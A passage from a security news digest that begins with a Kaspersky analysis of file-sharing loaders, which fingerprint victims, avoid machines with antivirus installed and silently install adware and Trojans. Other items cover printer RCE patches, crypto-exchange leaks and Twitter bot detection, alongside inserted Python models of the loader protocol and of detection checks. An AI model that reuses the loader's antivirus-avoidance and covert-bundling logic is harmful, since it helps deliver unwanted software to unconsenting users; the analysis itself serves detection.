At stage one, the loader transmits information about the downloaded installer, plus data for identifying the victim to the server. The message includes confidential information: user name, PC domain name, MAC address, machine SID, hard drive serial number, lists of running processes and installed programs. Naturally, the data is collected and transmitted without the consent of the device owner.

The server responds with a message containing the following information fields:
adverts list — with the installation conditions for certain partner software
content — contains the name of the file that the user originally intended to download and a link to it
icon — contains a link to an icon that is later downloaded and used when starting the graphical interface of the loader.

The installer checks that the conditions listed for each “advert” are fulfilled. If all conditions are met, the id of the advert is added to the adverts_done list. In the example above, for instance, the registry is checked for paths indicating that one of the selected antiviruses is installed on the computer. If this is the case, the partner software with id 1116 is not added to the adverts_done list and will not subsequently be installed on the user’s computer. The purpose of such a check is to prevent the installation of a program that would trigger antivirus software. Next, the generated list is sent to the server:

The server selects several ids (usually 3-5) from the resulting adverts_done list and returns them in the campaigns list. For each id, this list has a checkboxes field containing the text to be displayed in the installation consent window, the url field containing a link to the installer of the given advert, and the parameter field containing a key for installing the unwanted software in silent mode.
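To make the exchange concrete for anyone looking at such traffic, the Python below is an added model of it, not Kaspersky's code and not the loader's: it strips the double-Base64 wrapping described above, pulls out the adverts, content and icon fields, and reproduces the adverts_done filtering in which an advert is dropped when a registry path belonging to an installed antivirus is present. Only the field names, the adverts_done list and advert id 1116 come from the report; the JSON shape, the skip_if_registry key, the registry path and the sample response are constructed, and “inverted” is read as reversing the intermediate Base64 string, which is an assumption about the report's wording.

```python
"""Decoder for the layered Base64 encoding and a model of the adverts/adverts_done
exchange. Added example; JSON shape, skip_if_registry key and sample data are constructed."""
import base64
import json


def decode_layered(blob: bytes) -> bytes:
    """Undo Base64(reverse(Base64(msg))). 'Inverted' is taken to mean reversal of
    the intermediate string (assumption)."""
    return base64.b64decode(base64.b64decode(blob)[::-1])


def encode_layered(msg: bytes) -> bytes:
    """Forward direction, used here only to build the constructed sample."""
    return base64.b64encode(base64.b64encode(msg)[::-1])


def parse_response(blob: bytes) -> dict:
    """Extract the three response fields named in the report."""
    doc = json.loads(decode_layered(blob))
    return {key: doc.get(key) for key in ("adverts", "content", "icon")}


def adverts_done(adverts: list, present_registry_paths: set) -> list:
    """Ids whose conditions hold. Constructed condition: skip the advert when any
    listed registry path (an installed antivirus) is present on the machine."""
    done = []
    for adv in adverts:
        if any(p in present_registry_paths for p in adv.get("skip_if_registry", [])):
            continue
        done.append(adv["id"])
    return done


AV_PATH = r"HKLM\SOFTWARE\CONSTRUCTED-AV"          # constructed registry path

# Constructed server response wrapped exactly as the report describes.
CONSTRUCTED_RESPONSE = encode_layered(json.dumps({
    "adverts": [
        {"id": 1116, "skip_if_registry": [AV_PATH]},   # id 1116 is from the report
        {"id": 2001, "skip_if_registry": []},
    ],
    "content": {"name": "stalker_plugin.zip",
                "url": "http://files.invalid/stalker_plugin.zip"},
    "icon": "http://files.invalid/icon.ico",
}).encode())


def example_run(av_installed: bool) -> list:
    """Decode the constructed response and compute adverts_done for a machine
    with or without the antivirus registry path present."""
    present = {AV_PATH} if av_installed else set()
    return adverts_done(parse_response(CONSTRUCTED_RESPONSE)["adverts"], present)
```

The encoding adds no secrecy, which is the practical point for analysts: a two-line decoder recovers the full victim fingerprint sent at stage one and the installer list returned afterwards, so the plaintext fields make a usable detection signature on the wire.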

After that, a window opens that simulates the download process in Internet Explorer. The loader does not explicitly notify the user that additional programs will be installed on the computer along with the downloaded file. Their installation can be declined only by clicking a barely discernible slider in the bottom part of the window.

File loader window

During the file download process, software that the user does not deselect is installed inconspicuously. At the final stage of operation, the loader reports to the server about the successful installation of each individual product:

Installed software analysis
By analyzing the loader process, we managed to get some links to various programs that can be installed secretly. Although most of the software relates to different advertising families (that’s how Pbot finds its way onto user devices, for example), that is not the only thing distributed via file partner programs. In particular, around 5% of the files were legitimate browser installers. About 20% of the files are detected as malicious (Trojan, Trojan-Downloader, etc.).

Owners of file-sharing sites that cooperate with similar partner programs often do not even check what kind of content visitors get from the resource. As a result, anything at all can be installed on the user’s computer besides legitimate software. Therefore, in the absence of security solutions, such resources need to be used with extreme caution.

Kaspersky Lab products detect the loaders of file partner programs with the following verdicts:



Pentagon Restricts Use of Fitness Trackers, Other Devices
7.8.2018 securityweek  BigBrothers

WASHINGTON (AP) — Military troops and other defense personnel at sensitive bases or certain high-risk warzone areas won't be allowed to use fitness-tracker or cellphone applications that can reveal their location, according to a new Pentagon order.

The memo, obtained by The Associated Press, stops short of banning the fitness trackers or other electronic devices, which are often linked to cellphone applications or smart watches and can provide the users' GPS and exercise details to social media. It says the applications on personal or government-issued devices present a "significant risk" to military personnel, so those capabilities must be turned off in certain operational areas.

Under the new order, military leaders will be able to determine whether troops under their command can use the GPS function on their devices, based on the security threat in that area or on that base.

"These geolocation capabilities can expose personal information, locations, routines, and numbers of DOD personnel, and potentially create unintended security consequences and increased risk to the joint force and mission," the memo said.

Defense personnel who aren't in sensitive areas will be able to use the GPS applications if the commanders conclude they don't present a risk. For example, troops exercising at major military bases around the country, such as Fort Hood in Texas or Norfolk Naval Station in Virginia, would likely be able to use the location software on their phones or fitness devices. Troops on missions in more sensitive locations, such as Syria, Iraq, Afghanistan or parts of Africa, meanwhile, would be restricted from using the devices or be required to turn off any location function.

Army Col. Rob Manning, a Pentagon spokesman, said it's a move to ensure the enemy can't easily target U.S. forces.

"It goes back to making sure that we're not giving the enemy an unfair advantage and we're not showcasing the exact locations of our troops worldwide," Manning said.

Concerns about exercise trackers and other electronic devices came to a head in January in the wake of revelations that an interactive, online map was pinpointing troop locations, bases and other sensitive areas around the world.

The Global Heat Map, published by the GPS tracking company Strava, used satellite information to map the locations of subscribers to Strava's fitness service. At the time, the map showed activity from 2015 through September 2017. And while heavily populated areas were well lit, warzones such as Iraq and Syria showed scattered pockets of activity that could denote military or government personnel using fitness trackers as they move around.

The Pentagon immediately launched a review, noting that the electronic signals could potentially disclose the location of troops who are in secret or classified locations or on small forward operating bases in hostile areas.

This is the second memo affecting the use of cellphones and other electronic devices that the department has released in recent months. In May, defense officials laid out new restrictions for the use of cellphones and other mobile wireless devices inside the Pentagon.

That memo called for stricter adherence to long-held practices that require phones be left in storage containers outside secure areas where sensitive matters are discussed. But it also stopped short of banning the devices, and instead made clear that cellphones can still be used in common areas and other offices in the Pentagon if classified information is not present.

The latest memo says the new restrictions include GPS functions on fitness trackers, phones, tablets, smartwatches and other applications.

The Pentagon also said it will provide additional cybersecurity training to include the risks posed by the trackers and other mobile devices.

Heather Pierce, a spokeswoman for Fitbit, said Monday: "Fitbit is committed to protecting consumer privacy and keeping data safe. Unlike a smartphone, location data is not collected by Fitbit unless a user gives us access to the data, and users can always remove our access."

Facebook Asks Big Banks to Share Customer Details
7.8.2018 securityweek 

Facebook has asked major US banks to share customer data to allow it to develop new services on the social network's Messenger texting platform, a banking source told AFP on Monday.

Facebook had discussions with Chase, JPMorgan, Citibank, and Wells Fargo several months ago, said the source, who asked to remain anonymous.

The Silicon Valley-based social network also contacted US Bancorp, according to the Wall Street Journal, which first reported the news.

Facebook, which has faced intense criticism for sharing user data with many app developers, was interested in information including bank card transactions, checking account balances, and where purchases were made, according to the source.

Facebook confirmed the effort in a statement to AFP, but said it was not asking for transaction data.

"Like many online companies with commerce businesses, we partner with banks and credit card companies to offer services like customer chat or account management," Facebook said.

The goal was to create new ways for Messenger to be woven into, and facilitate, interactions between banks and customers, according to the reports. The smartphone texting service boasts 1.3 billion users.

"The idea is that messaging with a bank can be better than waiting on hold over the phone -- and it's completely opt-in," the statement said.

Citigroup declined to comment regarding any possible discussions with Facebook about Messenger.

"While we regularly have conversations about potential partnerships, safeguarding the security and privacy of our customers' data and providing customer choice are paramount in everything we do," Citigroup told AFP by email.

JPMorgan Chase spokeswoman Patricia Wexler directed AFP to a statement given to the Wall Street Journal saying, "We don't share our customers' off-platform transaction data with these platforms and have had to say 'No' to some things as a result."

Wells Fargo declined to address the news.

Privacy worries

Messenger can be used by businesses to help people keep track of account information such as balances, receipts, or shipping dates, according to the social network.

"We're not using this information beyond enabling these types of experiences -- not for advertising or anything else," Facebook explained in its statement.

"A critical part of these partnerships is keeping people's information safe and secure."

But word that Facebook is fishing for financial information comes amid concerns it has not vigilantly guarded private information.

Facebook acknowledged last month that it was facing multiple inquiries from US and British regulators about a scandal involving the now bankrupt British consultancy Cambridge Analytica.

In Facebook's worst ever public relations disaster, it admitted that up to 87 million users may have had their data hijacked by Cambridge Analytica, which was working for US President Donald Trump's 2016 election campaign.

Facebook CEO Mark Zuckerberg announced in May he was rolling out privacy controls demanded by European regulators to Facebook users worldwide because "everyone cares about privacy."

The social network is now looking at cooler growth following a years-long breakneck pace.

Shares in Facebook plummeted last week, wiping out some $100 billion, after the firm missed quarterly revenue forecasts and warned growth would be far weaker than previously estimated.

Shares in the social network have regained some ground, and rose 4.4 percent to close at $185.69 on Monday.

Group-IB experts record a massive surge of user data leaks from cryptocurrency exchanges
7.8.2018 securityaffairs Cryptocurrency

Group-IB researchers have investigated user data leaks from cryptocurrency exchanges and have analyzed the nature of these incidents.
Security experts from Group-IB, an international company specializing in preventing cyberattacks and developing information security solutions, have investigated user data leaks from cryptocurrency exchanges and have analyzed the nature of these incidents. Within a year, the number of data leaks soared by 369%.

The USA, Russia and China are TOP-3 countries in which registered users became the victims of cyberattacks.

In 2017, when cryptocurrencies were gaining momentum, their record-breaking capitalization and a spike in Bitcoin’s exchange rate led to dozens of attacks on cryptocurrency services. Based on data obtained from the Group-IB Threat Intelligence (cyber intelligence) system, experts from the international company Group-IB have analyzed the theft of 720 user accounts (logins and passwords) from the 19 largest cryptocurrency exchanges.

January holidays for hackers: a 689% surge in the number of leaks

The report «2018 Cryptocurrency Exchanges. User Accounts Leaks Analysis» shows a steady increase in the number of compromised user accounts on cryptocurrency exchanges. In 2017, their number increased by 369% compared to 2016. The first month of 2018 set a record: due to growing interest in cryptocurrencies and the blockchain industry, in January the number of incidents jumped by 689% compared to the 2017 monthly average. The USA, Russia, and China are the countries where users are targeted most often. The study has shown that every third victim of the attack is located in the United States.

cryptocurrency exchanges affected

Toolkit and infrastructure used for attacks

Experts of Group-IB have identified 50 active botnets used for launching cyberattacks on cryptocurrency exchanges users. The infrastructure used by cybercriminals is mainly based in the USA (56.1%), the Netherlands (21.5%), Ukraine (4.3%) and Russia (3.2%).

cryptocurrency exchanges affected

The attackers use an increasingly wide range of malicious software and update their tools on a regular basis. The most frequently used malicious software includes Trojans such as AZORult and Pony Formgrabber, as well as the Qbot. At the same time, cybercriminals have modified tools previously used for attacks on banks and now successfully use them to hack cryptocurrency exchanges and gain access to users’ personal data.

What makes a successful attack possible?

This is one of the key issues covered in the Group-IB report. The answer is actually quite simple: disregard for information security and underestimating the capabilities of cybercriminals. The first and main cause is that both users and exchanges omit to use two-factor authentication. The second cause is disregard for basic security rules such as the use of complex and unique passwords.

Group-IB has analyzed 720 accounts and found that one out of five users chose a password shorter than 8 characters (see Figure).

cryptocurrency exchanges affected

Attack as a premonition

Experts of Group-IB draw a bleak conclusion: currently no cryptocurrency exchange, regardless of its size and track record, can guarantee absolute security to its users. At least 5 out of 19 exchanges in question fell victim to targeted cyberattacks widely covered by the media. These are Bitfinex, Bithumb, Bitstamp, HitBTC, Poloniex and, presumably, Huobi. There are various attack vectors: errors in the source code of the software, phishing attacks, unauthorized access to the user database, vulnerabilities related to storage and withdrawal of funds. However, all of them stem from the lack of attention to information security and protection of digital assets.

“Increased fraudulent activity and attention of hacker groups to cryptoindustry, additional functional of malicious software related to cryptocurrencies, as well as the significant amounts of already stolen funds, signals that the industry is not ready to defend itself and protect its users”, says Ruslan Yusufov, the Director of Special Projects at Group-IB. “In 2018 we will see even more incidents. This situation requires prompt and effective response of all stakeholders, including experts in different areas.”

Recommendations of Group-IB experts to users and exchanges

In order to protect one’s funds against crypto-fraud, Group-IB recommends users to be mindful of their passwords (which should contain at least 14 unique symbols), never use the same passwords for different exchanges and always enable the 2FA (two-factor authentication). Experts recommend avoiding the use of public Wi-Fi (at least when carrying out exchange transactions) and paying special attention to one’s “traces” on the social media. For instance, users should not demonstrate the fact that they possess any cryptocurrency.

Recommendations to cryptoexchanges are also of high importance. First of all, they are strongly advised to make two-factor authentication obligatory for all the users and their operations, conduct regular security audits of IT infrastructure and related services, and allocate resources to training and awareness-raising concerning personnel security, starting from top management (founders) and down to rank-and-file employees. To improve the cybersecurity of cryptocurrency exchanges, experts also recommend installing Anti-APT solutions, using Threat Intelligence and implementing anti-fraud solutions, as well as behavioral analysis systems. Specialists also suggest preparing cybersecurity incident response plans which will minimize potential damage.

HP releases firmware updates for two critical RCE flaws in Inkjet Printers
7.8.2018 securityaffairs

HP has released firmware updates that address two critical remote code execution vulnerabilities in some models of inkjet printers.
HP has released firmware updates to address two critical RCE flaws affecting some Inkjet printers. The two flaws, tracked as CVE-2018-5924 and CVE-2018-5925, could be exploited by attackers to trigger stack or static buffer overflow.

An attacker can exploit the vulnerabilities by sending a specially crafted file to the vulnerable inkjet printers.

“Two security vulnerabilities have been identified with certain HP Inkjet printers. A maliciously crafted file sent to an affected device can cause a stack or static buffer overflow, which could allow remote code execution.” reads the security advisory published by HP.

The flaws have been assigned a CVSS score of 9.8 and affected roughly 160 models, including PageWide, DesignJet, Officejet, Deskjet, Envy, and Photosmart.

To download the firmware updates, go to the HP Software and Drivers page for your product and find the appropriate firmware update from the list of available software.
Go to the Upgrading Printer Firmware page and follow the instructions provided to install the firmware.

HP inkjet printers hacking

Flaws in the firmware of printers are not a novelty. In November 2017, experts from the FoxGlove Security firm found a potentially serious remote code execution vulnerability in some of HP’s enterprise printers.

Recently HP launched a private bug bounty program that offers up to $10,000 to white hat hackers who discover serious issues in its printers.

Ex-Tesla Worker Accused of Hacking Seeks $1M in Counterclaim

6.8.2018 securityweek  Hacking

Tesla Breach

RENO, Nev. (AP) — A former Tesla Inc. employee at the electric car maker's battery plant in Nevada is seeking at least $1 million in defamation damages after it accused him of sabotage, hacking into computers and stealing confidential information leaked to the media.

Lawyers for Martin Tripp filed a counterclaim in federal court this week alleging any damages Tesla incurred were caused or contributed to by Tesla's "own negligence, acts or omissions."

Tripp alleges that between $150 million and $200 million worth of battery module parts for Tesla's Model 3 vehicle were incorrectly handled as scrap earlier this year. He said more than 700 dented and/or punctured battery modules were not discarded and instead were being shipped or were in the process of being shipped to customers.

A punctured battery could pose a fire risk.

Tesla officials did not respond to repeated requests for comment from The Associated Press on Thursday.

Tripp said he was recruited by Tesla, moved to Sparks, Nevada, from Wisconsin and started working at the battery factory in October 2017 as a lead process engineering technician. He was fired June 19.

Tesla filed the lawsuit against Tripp on June 20, three days after Musk warned employees of sabotage from within the company.

In the months prior, Tripp witnessed "several concerning business practices" inconsistent with Tesla's representations to investors and the general public, according to his counterclaim filed in U.S. District Court in Reno on Tuesday.

Tripp said he repeatedly questioned supervisors about the large quantities of waste and scrap vehicle parts he observed "lying haphazardly on the ground inside the Gigafactory." But his concerns were never addressed or resolved, Tripp said.

Tripp said he emailed CEO Elon Musk directly about his concerns on May 16 before Musk was scheduled to visit the factory east of Sparks that night. Later that day, Tripp said his manager asked him to forward the email he sent to Musk "so that I can avoid getting fired tonight," according to the lawsuit.

His counterclaim says a design engineer also told Tripp to clean up the production line area so Musk wouldn't see the mounds of scrap and waste lying on the ground, but Tripp declined to do so because he wanted Musk "to see how the Gigafactory was actually being operated." He said he was reassigned to a different position the following day.

Tesla's original lawsuit said Tripp admitted to Tesla investigators that he wrote software that transferred several gigabytes of data outside the company, including dozens of photographs and a video, according to the lawsuit filed Wednesday. Hacking software from Tripp also was running on three computer systems of other employees "so that the data would be exported even after he left the company and so that those individuals would be falsely implicated," the lawsuit alleged.

The lawsuit said Tripp made false claims about the information he stole, including claims that Tesla used punctured battery cells in the Model 3, and claims about the amount and value of scrap material generated by Tesla's manufacturing process. Some of the claims made it into media stories about the company, but media organizations are not identified in the lawsuit.

Tripp, a former aviation electronics technician in the U.S. Navy who worked two decades in the electronic and engineering industries, said in his counterclaim he "did not sabotage Tesla or its operations" and his actions "were necessary, reasonable and/or privileged."

He acknowledged in the counterclaim that he had made claims about the scrap and punctured battery cells being used in Model 3 vehicles. But he said he did not direct code changes to the Tesla Manufacturing Operating System under false user names or export large amounts of highly sensitive Tesla data as Musk had asserted.

After he was reassigned to a new position, Tripp "learned of and witnessed additional unnerving, dangerous and wasteful business practices," including employees systematically reusing parts and battery cells that had been previously discarded as waste, the suit said.

The scrap problem dramatically increased in March 2018 when Tesla initiated a company-wide effort to reach its publicized goal of producing 2,500 Model 3 vehicles per week, the lawsuit said. It said the production push — with an objective of making 5,000 vehicles per week by July 2018 — was known as the "March to 2,500."

GitHub to Warn Users on Compromised Passwords
6.8.2018 securityweek  Incident

In a move to protect its users, software repository site GitHub is now alerting account holders whenever it detects that a password has been compromised in breaches on other services.

Security experts have long pushed for the use of long, unique passwords, to ensure stronger security of all online accounts. However, even unique passwords can pose a great risk when compromised, especially if attackers can link them to specific accounts.

The new feature is the result of a partnership with Troy Hunt, the security researcher behind the popular HaveIBeenPwned.com project. The service allows users to check whether their accounts and passwords have appeared in any data breaches.

An internal tool GitHub has created is now taking advantage of a 517 million record dataset that Hunt made available for download through his service to “validate whether a user’s password has been found in any publicly available sets of breach data.”

The open-source software repository platform enabled the feature last week. The functionality, it says, is meant to alert all people who are using compromised passwords and prompt them to select a different one during login, registration, or when updating their password.

“Don’t worry, your password is protected by the password hashing function bcrypt in our database. We only verify whether your password has been compromised when you provide it to us,” GitHub explains.
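The check described above, as an added example that is not GitHub's or Have I Been Pwned's code: the plaintext is screened against a breach corpus only at the moment the user supplies it (registration, login, password change), while the stored credential remains a salted slow hash. It assumes the corpus is distributed as uppercase hex SHA-1 digests of leaked passwords (the format of the Pwned Passwords download) and indexes them by the first five hex characters, which is the same hash-prefix bucketing the HIBP range API uses; the three-entry corpus is constructed inline, and PBKDF2 from the standard library stands in for bcrypt, which is not in the standard library.

```python
"""Breach-list password screening at the moment the plaintext is available.

Added example, not GitHub's or HIBP's code. Assumptions: the breach corpus is a
set of uppercase hex SHA-1 digests; the stored credential is a salted PBKDF2
hash standing in for bcrypt.
"""
import hashlib
import hmac
import os
from typing import Dict, Optional, Set, Tuple

# Constructed breach corpus: SHA-1 digests of three well-known weak passwords.
# A real deployment loads hundreds of millions of these from the downloaded file.
BREACHED_SHA1 = {
    hashlib.sha1(p.encode()).hexdigest().upper()
    for p in ("password", "123456", "qwerty123")
}

# Range index: 5-hex-char prefix -> set of 35-char suffixes. This is how the
# HIBP range API partitions the corpus, so the same lookup works either way.
RANGE_INDEX: Dict[str, Set[str]] = {}
for _digest in BREACHED_SHA1:
    RANGE_INDEX.setdefault(_digest[:5], set()).add(_digest[5:])


def is_compromised(password: str) -> bool:
    """True if the password's SHA-1 digest appears in the breach corpus.

    Only the plaintext handed over by the user is hashed here; nothing is
    derived from the stored credential, which is a slow salted hash.
    """
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    return digest[5:] in RANGE_INDEX.get(digest[:5], set())


def hash_for_storage(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Salted slow hash for the credential store (PBKDF2 stands in for bcrypt)."""
    salt = salt or os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, key


def verify_stored(password: str, salt: bytes, key: bytes) -> bool:
    """Constant-time comparison of the recomputed hash against the stored one."""
    _, candidate = hash_for_storage(password, salt)
    return hmac.compare_digest(candidate, key)


def register(password: str) -> dict:
    """Registration / password change: refuse breached passwords outright,
    otherwise return the salt and hash to store."""
    if is_compromised(password):
        return {"accepted": False, "reason": "password found in breach data"}
    salt, key = hash_for_storage(password)
    return {"accepted": True, "salt": salt, "hash": key}


def login(password: str, salt: bytes, key: bytes) -> dict:
    """Login: verify the credential and, while the plaintext is in hand, re-check
    it against breach data so an existing account can be prompted to change."""
    ok = verify_stored(password, salt, key)
    return {"authenticated": ok, "warn_compromised": ok and is_compromised(password)}


if __name__ == "__main__":
    print(register("password"))                     # refused: in breach data
    rec = register("correct horse battery staple")  # accepted
    print(login("correct horse battery staple", rec["salt"], rec["hash"]))
```

The login path is the interesting one: an account created before a breach list grew to include its password is never rejected (that would lock the user out), but the re-check at login is what lets the site prompt for a change, which is the behaviour the article describes.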

Users who have two-factor authentication (2FA) enabled will receive periodic warnings to review the 2FA setup and recovery options, GitHub also reveals.

However, traditional 2FA options such as SMS have proven to be unreliable, and all of the online platform’s users are advised to use a 2FA authenticator application that supports cloud backups, to ensure a recovery option is always available for them.

“These new account security enhancements will help improve the security of your account. We hope you will take this opportunity to review the security of your account. Balancing security, usability, and recoverability is a personal decision,” GitHub notes.

The service’s users are advised to generate strong, unique passwords using a dedicated manager, to enable 2FA, and to make sure an account-recovery method is available. They should also update their primary email address if necessary and review their other credentials on the platform, GitHub says.

GitHub, which will soon become part of Microsoft, has made other security improvements as well, including the enforcing of SSL/TLS. This, however, did not stop hackers from compromising accounts to spread malicious code, as was the case with the recent Gentoo incident.

HP Patches Critical RCE Flaws in Inkjet Printers
6.8.2018 securityweek 

HP has released firmware updates for many of its inkjet printers to address a couple of critical vulnerabilities that can be exploited for remote code execution.

According to the HP Product Security Response Team (PSRT), the company’s Inkjet printers are affected by flaws that allow an attacker to trigger a stack or static buffer overflow and execute arbitrary code by sending a specially crafted file to an affected device.

The vulnerabilities are tracked as CVE-2018-5924 and CVE-2018-5925, and they have both been assigned a CVSS score of 9.8.

HP has shared a list of roughly 160 impacted products, including PageWide, DesignJet, Officejet, Deskjet, Envy and Photosmart devices. The firmware updates for each impacted product can be obtained from HP’s website.

This is not the first time a remote code execution flaw has been found in HP printers. Last year, researchers discovered several potentially serious vulnerabilities in some of HP’s enterprise printers, including an RCE bug affecting LaserJet Enterprise, PageWide Enterprise, LaserJet Managed and OfficeJet Enterprise printers.

HP recently announced the launch of a private bug bounty program that offers up to $10,000 for serious vulnerabilities found in the company’s printers. HP had invited 34 researchers by the time the initiative was unveiled.

The program covers HP LaserJet Enterprise printers and MFPs (A3 and A4), as well as the HP PageWide Enterprise printers and MFPs (A3 and A4).

Campaigns on Their Own as Cyber Threats Roil Midterms
6.8.2018 securityweek  Cyber

NEW YORK (AP) — Kamala Harris has been the target of social media misinformation campaigns since she became a U.S. senator.

Every month for the last 18 months, her office has discovered on average between three and five fake Facebook profiles pretending to be hers, according to a Harris aide. It's unclear who creates the pages, which are often designed to mislead American voters about the ambitious Democratic senator's policies and positions.

The aide spoke on the condition of anonymity, like more than a half dozen campaign officials contacted for this story, for fear of attracting unwanted attention from adversaries or scrutiny on the Senate office's evolving cybersecurity protocols.

Such internet mischief has become commonplace in U.S. politics. Facebook announced earlier this week that it uncovered "sophisticated" efforts, possibly linked to Russia, to influence U.S. politics on its platforms. Senior intelligence officials declared Thursday that foreign adversaries continue waging a quiet war against U.S. campaigns and election systems.

Still, one thing has become clear: With the midterm elections just three months away, campaigns are largely on their own in the increasingly challenging task of protecting sensitive information and countering false or misleading content on social media.

The Democratic National Committee has worked to strengthen its own internal security protocols and encouraged state parties to do the same, according to Raffi Krikorian, who previously worked for Uber and Twitter and now serves as the DNC's chief technology officer.

But in an interview, he acknowledged there are limits to how much the national party can protect the thousands of Democratic campaigns across the country.

"We're providing as much assistance to campaigns as we can, but there's only so much we can do," Krikorian said.

"For all the high-level campaigns I'm worried, but at least there are people to talk to," he continued. "The mid-sized campaigns are at least getting technical volunteers, but the truly down-ballot campaigns, that's where the state parties and coordinated campaigns can help, but there's no doubt that this is an uphill battle when we're dealing with a foreign adversary."

Officials in both political parties have intensified cybersecurity efforts, although the known cases of interference have so far overwhelmingly focused on Democrats.

The DNC now has a staff of 40 on its technical team, led by Krikorian and other Silicon Valley veterans hired in the months after Russians hacked the party's email system and released a trove of damaging messages in the months before President Donald Trump's 2016 victory.

Top U.S. intelligence and homeland security officials raised new alarms Thursday about outside efforts to influence the 2018 and 2020 elections during a White House press briefing.

Homeland Security chief Kirstjen Nielsen said: "Our democracy is in the crosshairs," while Director of National Intelligence Dan Coats added: "We continue to see a pervasive messaging campaign by Russia to try to weaken and divide the United States."

Facebook said it removed 32 accounts from its site and Instagram because they were involved in "coordinated" political behavior and appeared to be fake. Nearly 300,000 people followed at least one of the accounts, which featured names such as "Black Elevation" and "Resisters" and were designed to manipulate Americans with particular ethnic, cultural or political identities.

In many cases, House and Senate political campaigns said they're just beginning to adopt basic internal security protocols, such as two-step verification for all email, storage and social media accounts and encrypted messaging services such as Wickr.

There is no protocol in place for campaigns or national parties to monitor broader social media misinformation campaigns, however. Nor is there any sign that law enforcement is playing a proactive role to protect campaigns from meddling on a day-to-day basis.

The FBI has set up a Foreign Influence Task Force and intelligence agencies are collecting information on Russian aggression, but campaigns report no regular contact with law enforcement officials.

"At the end of the day, the U.S. government is not putting any type of a bubble around any (campaign). They do not have the authority, capacity or capability to do it," said Shawn Henry, a former senior FBI official who now leads the cybersecurity firm CrowdStrike, which works with political campaigns. "NSA is not sitting in the ISPs filtering out malicious traffic."

Henry added: "They've got to take pro-active actions themselves."

Earlier this month, Microsoft said it discovered a fake domain had been set up as the landing page for phishing attacks by a hacking group believed to have links to Russian intelligence. A Microsoft spokesman said this week that additional analysis confirmed the attempted attacks occurred in late 2017 and targeted multiple accounts associated with the offices of two legislators running for re-election. Microsoft did not name the lawmakers.

Sen. Claire McCaskill, D-Mo., said Russian hackers tried unsuccessfully to infiltrate her Senate computer network in 2017. Former Democratic U.S. Rep. Brad Ashford of Nebraska also recently confirmed that his 2016 campaign emails had been hacked by Russian agents.

Ashford, who narrowly lost his seat to Republican Don Bacon that year, said hackers obtained all of his campaign email correspondence with the Democratic Congressional Campaign Committee. He said he was notified of the breach in late July or early August 2016 by House Democratic Leader Nancy Pelosi's office.

Ashford has said he doesn't believe any of the stolen information ever went to Bacon or the Republican Party, and he doesn't know whether it made a difference in his race. He did face a series of anonymous political attacks on social media.

By their very nature, U.S. political campaigns can be a challenge to defend from a cybersecurity standpoint. They are essentially pop-up organizations that rely heavily on volunteers and are focused on a singular task — winning. In addition, high-level IT expertise costs money and campaigns typically run on tight budgets.

Some 2018 House campaigns have yet to hire basic communications staffers.

In the case of California Sen. Harris, who is considered a 2020 presidential prospect, her office plans to continue rooting out fake social media profiles on its own. They have had no contact with the FBI. They have reported the issue to Facebook in every case — not the other way around.

"It's on the forefront of everybody's mind," said Patrick McHugh, a former Senate campaign official who now leads the Democratic-aligned super PAC Priorities USA.

He acknowledged the tremendous challenge for many campaigns.

"All it takes is one person on a campaign to make a mistake," McHugh said. "You're up against a foreign country. That's a pretty big adversary that can and will go to all ends to get in."

New Open Source Tools Help Find Large Twitter Botnets
6.8.2018 securityweek  BotNet

Duo Security has created open source tools and disclosed techniques that can be useful in identifying automated Twitter accounts, which are often used for malicious purposes.

The trusted access solutions provider, which Cisco recently agreed to acquire for $2.35 billion, has collected and studied 88 million Twitter accounts and over half a billion tweets. Based on this data, which the company says is one of the largest random datasets of Twitter accounts analyzed to date, researchers were able to create algorithms for differentiating humans from bots.

The dataset, collected using Twitter’s API, includes profile name, tweet and follower count, avatar, bio, content of tweets, and social network connections.

Researchers created their tools and techniques for identifying bots based on 20 unique account characteristics, including the number of digits in a screen name, followers/following ratio, number of tweets and likes relative to the account’s age, number of users mentioned in a tweet, number of tweets with the same content, percentage of tweets with URLs, time between tweets, and average hours tweeted per day.
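Several of the account characteristics listed above, computed over constructed data, as an added example that is not Duo Security's released tooling. The feature definitions follow the list (digits in the screen name, followers/following ratio, tweets and likes relative to account age, duplicate tweet content, share of tweets with URLs, mentions per tweet, time between tweets, hours of the day with activity); the threshold values and the indicator-count score are assumptions chosen for illustration, and the two user records and their tweets are constructed inline in the rough shape of Twitter API objects.

```python
"""Account-level features for telling automated Twitter accounts from humans.

Added example, not Duo Security's code. Thresholds and the scoring rule are
assumptions for illustration; user and tweet records are constructed.
"""
from datetime import datetime, timedelta
import re
import statistics

URL_RE = re.compile(r"https?://\S+")
NOW = datetime(2018, 8, 6, 12, 0, 0)  # fixed clock so the figures are reproducible


def account_features(user, tweets, now=NOW):
    """Compute a subset of the listed characteristics for one account."""
    age_days = max((now - user["created_at"]).total_seconds() / 86400, 1.0)
    texts = [t["text"] for t in tweets]
    times = sorted(t["created_at"] for t in tweets)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    hours_by_day = {}
    for t in times:
        hours_by_day.setdefault(t.date(), set()).add(t.hour)
    n = len(texts)
    return {
        "screen_name_digits": sum(c.isdigit() for c in user["screen_name"]),
        "follow_ratio": user["followers"] / max(user["following"], 1),
        "tweets_per_day": n / age_days,
        "likes_per_day": user["likes"] / age_days,
        "dup_tweet_fraction": (1 - len(set(texts)) / n) if n else 0.0,
        "url_tweet_fraction": (sum(bool(URL_RE.search(t)) for t in texts) / n) if n else 0.0,
        "mean_mentions": (sum(t.count("@") for t in texts) / n) if n else 0.0,
        "median_gap_seconds": statistics.median(gaps) if gaps else None,
        "active_hours_per_day": statistics.mean(len(h) for h in hours_by_day.values()) if hours_by_day else 0.0,
    }


# Assumed thresholds (illustration only); the paper trains real classifiers.
INDICATORS = {
    "screen_name_digits": lambda v: v >= 4,          # long numeric suffix in handle
    "follow_ratio": lambda v: v < 0.1,               # follows far more than it is followed
    "tweets_per_day": lambda v: v > 50,              # volume implausible for a person
    "dup_tweet_fraction": lambda v: v > 0.5,         # mostly repeated content
    "url_tweet_fraction": lambda v: v > 0.8,         # nearly every tweet carries a link
    "mean_mentions": lambda v: v >= 1.0,             # every tweet tags someone
    "median_gap_seconds": lambda v: v is not None and v < 3600,  # machine-like cadence
    "active_hours_per_day": lambda v: v > 8,         # posting round the clock
}


def bot_score(features):
    """Number of indicators the account trips."""
    return sum(1 for name, test in INDICATORS.items() if test(features[name]))


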